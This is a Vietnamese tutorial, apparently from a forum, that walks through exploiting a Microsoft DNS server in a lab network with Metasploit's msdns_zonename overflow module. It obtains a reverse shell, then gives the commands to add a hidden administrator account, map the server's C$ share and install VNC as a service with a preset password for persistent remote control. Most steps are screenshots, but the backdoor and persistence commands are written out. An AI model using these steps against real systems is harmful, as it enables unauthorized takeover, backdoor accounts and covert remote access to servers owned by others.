Khai thác DNS server với Metasploit
 

Các bước khai thác DNS server với Metasploit

-Cài đặt và chạy chương trình Metasploit tại máy 10.100.100.100 để bắt đầu khai thác DNS Server tại địa chỉ 10.100.100.250

http://achilles2008.webs.com/dns/h1.PNG

Double click lên dòng msdns_zonename Microsoft DNS RPC Service extractQuotedChar() Overflow (TCP)

http://achilles2008.webs.com/dns/h2.PNG

-Chọn hệ điều hành

http://achilles2008.webs.com/dns/h3.PNG

-Chọn kiểu lấy shell là window/shell_reverse_tcp

http://achilles2008.webs.com/dns/h4.PNG

-Nhập địa chỉ ip của DNS server,trong trường hợp này là 10.100.100.250

http://achilles2008.webs.com/dns/h5.PNG

-Xem lại thông tin => Apply để bắt đầu khai thác

http://achilles2008.webs.com/dns/h6.PNG

-Nếu khai thác thành công ta sẽ lấy được shell của máy DNS server

http://achilles2008.webs.com/dns/h7.PNG

-R-click => Interact Session để lấy shell

http://achilles2008.webs.com/dns/h8.PNG

-Giao diện shell của DNS server sau khi bị khai thác

http://achilles2008.webs.com/dns/h9.PNG

-Tao user ten admin sau đó add vao group administrators

net user admin p@ssw0rd /add
net localgroup administrators admin /add

http://achilles2008.webs.com/dns/h10.PNG

-Trên máy 10.100.100.100 sử dụng lệnh :
net use H: \\10.100.100.250\C$ /user:admin p@ssw0rd để map ổ đĩa C$ trên DNS server về máy 10.100.100.100

http://achilles2008.webs.com/dns/h11.PNG

-Copy thư mục VNC lên ổ đĩa H: mới map về ,với nội dung của file install.bat như sau
winvnc4 –register -đằng ký vnc chạy như 1 dịch vụ
winvnc4 –start -khởi chạy vnc
regedit /s vncpass.reg –import file vncpass.reg để cấu hình mật khẩu cho vnc

http://achilles2008.webs.com/dns/h12.PNG

http://achilles2008.webs.com/dns/h13.PNG

-Chạy file install.bat để trên shell có được trên DNS server

http://achilles2008.webs.com/dns/h14.PNG

-Trên máy 10.100.100.100 chạy vncviewer để bắt đầu điều khiển

http://achilles2008.webs.com/dns/h15.PNG

Tks


:battay: